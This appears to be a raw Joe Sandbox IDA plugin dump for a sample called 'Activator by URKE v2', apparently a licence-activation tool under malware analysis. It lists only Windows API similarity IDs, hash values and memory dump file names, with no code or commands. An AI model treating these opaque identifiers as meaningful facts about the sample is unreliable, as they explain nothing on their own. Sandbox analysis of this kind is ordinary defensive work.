                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseFindswprintf
                                                                                                                                                                                                                                                  • String ID: zip$zipx
                                                                                                                                                                                                                                                  • API String ID: 2713956076-1268445101
                                                                                                                                                                                                                                                  • Opcode ID: d8d2ea2c5374122acc69c3193e031fe88e98369d5f1618340fb179d33e827a7f
                                                                                                                                                                                                                                                  • Instruction ID: 08f97d4b09b385d410f0ad63a89b57723b5386a8b60eec2a1d7b9901c6b40684
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8d2ea2c5374122acc69c3193e031fe88e98369d5f1618340fb179d33e827a7f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A81B061F08A0A85FA00EB65E8603FCA362AF44F99FC40233DE5D97695DE7CE555C322
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
• Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                                                                                                                                  • String ID: EDIT
                                                                                                                                                                                                                                                  • API String ID: 4243998846-3080729518
                                                                                                                                                                                                                                                  • Opcode ID: 97649a043c3252f54d481027b362a8cb3c0219486fdf1255c1e6258ed32498fa
                                                                                                                                                                                                                                                  • Instruction ID: 444d90a050dfd41c0c536f04c9f9229a3773c965423c31db5f7f37eae0842815
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97649a043c3252f54d481027b362a8cb3c0219486fdf1255c1e6258ed32498fa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B013661B1964B41FA20BB21E8307F6E354AF59F94FC85033C94D87695DE3CD549CB21
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
• Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileWrite$Handle
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4209713984-0
                                                                                                                                                                                                                                                  • Opcode ID: 407f625d59d604b924eb6a4f57d6f6a75d77dcc3e5834d4536d90adbb701eae7
                                                                                                                                                                                                                                                  • Instruction ID: 3f63431d988ab882c7592b6bc3a30d1d39ca862b5f5c9810f9432a914309cb4e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 407f625d59d604b924eb6a4f57d6f6a75d77dcc3e5834d4536d90adbb701eae7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA51E862B1975A92EB20EB25D6647B9A360BF44F94FC01133DA8D8B690DF3CE454C721
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
• Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$TextWindow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2912839123-0
                                                                                                                                                                                                                                                  • Opcode ID: 90840ec6fdea3326dc6836d829e73a3af53da93e834a76650bb7e12bad06c41e
                                                                                                                                                                                                                                                  • Instruction ID: d1a48c9ff5895c7bbdd04ed0f7f700a8cc1730cef7fb6f0efdcae7a81ba09e2d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90840ec6fdea3326dc6836d829e73a3af53da93e834a76650bb7e12bad06c41e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3151BE62F1479980FA00ABA5D5643ECB322AF44FD4F900237DA5C9BADADE7CD4448322
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
• Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1452418845-0
                                                                                                                                                                                                                                                  • Opcode ID: 82ea77dc686828d8d4b6b6f5dd528249c478d0f7ec0ca3c5a3cf5b807b775c11
                                                                                                                                                                                                                                                  • Instruction ID: db2e930ff9ed62f479fd54e9ffeae73c3cc902732108928ed39ee86aeeb0a715
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82ea77dc686828d8d4b6b6f5dd528249c478d0f7ec0ca3c5a3cf5b807b775c11
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE311A21E0820B85FA14BB6596723F9A2919F41B84FC4443BD94ECBAD7DE3DF8058633
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
• Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2359106489-0
                                                                                                                                                                                                                                                  • Opcode ID: b1db56c0457af69a1529a8ecbfe86314167c05b0bf6f6c19be2aba948e3cdc26
                                                                                                                                                                                                                                                  • Instruction ID: 6cb3d033ec54a79585ba7c2cafc74cf2e66240ddc5f14a51580e9a9565ae9166
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1db56c0457af69a1529a8ecbfe86314167c05b0bf6f6c19be2aba948e3cdc26
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B310722A0D74A81EA20BB25A66837EE251FF94F90FD40233DDDDCB695DF3CD4518222
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
• Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2244327787-0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
• Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DirectoryInitializeMallocSystem
                                                                                                                                                                                                                                                  • String ID: riched20.dll
                                                                                                                                                                                                                                                  • API String ID: 174490985-3360196438
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$FileOperation
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2032784890-0
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3668304517-0
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2272807158-0
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2176759853-0
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1203560049-0
                                                                                                                                                                                                                                                  • Opcode ID: b265933569970aa9f88eee972e8007fd8b91439cfa1828cb055f1fca20ce9a43
                                                                                                                                                                                                                                                  • Instruction ID: bb29dba1b31f42b19ed2733dab6888e51e2482a5fa317e84c761358b2bddab4d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b265933569970aa9f88eee972e8007fd8b91439cfa1828cb055f1fca20ce9a43
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6212B22B1878942EA20AF24E46036DA361FF88F94FD04232EEDDC6695DF3CD550C721
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3118131910-0
                                                                                                                                                                                                                                                  • Opcode ID: df95a73e4d643e9604293c38faa31d47468479eac191cd886206386da3b21c8e
                                                                                                                                                                                                                                                  • Instruction ID: d3422bd826fe6ee0a24b178019806f750af65e9afb3916e395e2547749e10784
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df95a73e4d643e9604293c38faa31d47468479eac191cd886206386da3b21c8e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF21D822A1878981FA10AB24F56036AA360FB84FD4FC00236EADD86695DF3CD551C721
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1203560049-0
                                                                                                                                                                                                                                                  • Opcode ID: ef92913312bb73a90d90e731208bb6c0704bd2d73e0e832659789265a95f0d3b
                                                                                                                                                                                                                                                  • Instruction ID: b1320a012fe44497f83a0f152c3362d336c2b64be9bf04c0f30aaf198ba1c0dc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef92913312bb73a90d90e731208bb6c0704bd2d73e0e832659789265a95f0d3b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1721A932A1878942EA10AB24E554369A361FB88FA4FD04232EAED87695DF3CD5418B11
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                                  • Opcode ID: 0d5958cce1ab38587c529cfbb209ba956894e29a38315a5b4669c830f79dc8c5
                                                                                                                                                                                                                                                  • Instruction ID: ef94c5e10182ea3224415be7f132502c664e447baf92ef8f61c4e2df1224f5b8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d5958cce1ab38587c529cfbb209ba956894e29a38315a5b4669c830f79dc8c5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AE04864B1430D82EB047B3199717F553569F44F41F804439CC8E83357CD3DA4498272
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3668304517-0
                                                                                                                                                                                                                                                  • Opcode ID: 456ef8ad5fd7c51842a77fc0017af3233e47992e66e1eb3dc404b7829346f65c
                                                                                                                                                                                                                                                  • Instruction ID: 6cbc66c89b46025fba5366bc3e199f9f01f9a87f03414a039d83576016cb0659
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 456ef8ad5fd7c51842a77fc0017af3233e47992e66e1eb3dc404b7829346f65c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E271B062B14A4A85FA00EB64E4643ECA366AF44FE8F840133DA2C877D9DE3CE451C365
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                                                                                                                                  • Opcode ID: afbb24ce4a808c86d9ab97423e5b5b7dbeb16d4b7f73d0bc2ed342d630b90402
                                                                                                                                                                                                                                                  • Instruction ID: 2a1fc5d6630cf47798d6a4363f5187d9ae2c324201a72b59f019e0a1c779c645
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: afbb24ce4a808c86d9ab97423e5b5b7dbeb16d4b7f73d0bc2ed342d630b90402
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79310B22B19B8A42EA706B19D6607B8A350AF44FD4FC40133DE9D8B794EE3CE4518732
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3587649625-0
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1746051919-0
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$BuffersFlushTime
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1392018926-0
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: LoadString
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2948472770-0
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ItemRectTextWindow$Clientswprintf
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3322643685-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1173176844-0
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 485612231-0
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1017591355-0
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3668304517-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5EF6288: FindClose.KERNEL32(?,?,?,00007FF7E5EFFFA5), ref: 00007FF7E5EF62BD
                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E5F079DB
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1011579015-0
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3668304517-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3668304517-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3947729631-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5EF6288: FindClose.KERNEL32(?,?,?,00007FF7E5EFFFA5), ref: 00007FF7E5EF62BD
                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E5F05023
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1011579015-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: BuffChar
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1973267554-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5EF647C: FindFirstFileW.KERNEL32 ref: 00007FF7E5EF64CB
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5EF647C: FindFirstFileW.KERNEL32 ref: 00007FF7E5EF651E
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5EF647C: GetLastError.KERNEL32 ref: 00007FF7E5EF656F
                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?,?,?,00007FF7E5EFFFA5), ref: 00007FF7E5EF62BD
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464966427-0
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ItemMessageSend
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3015471070-0
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentDirectory
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1611563598-0
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 749574446-0
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                                                                                                                                                                                                                                                  • String ID: %ls$%s: %s
                                                                                                                                                                                                                                                  • API String ID: 2539828978-2259941744
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfomemcpy_s
                                                                                                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                  • API String ID: 1759834784-2761157908
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1693479884-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
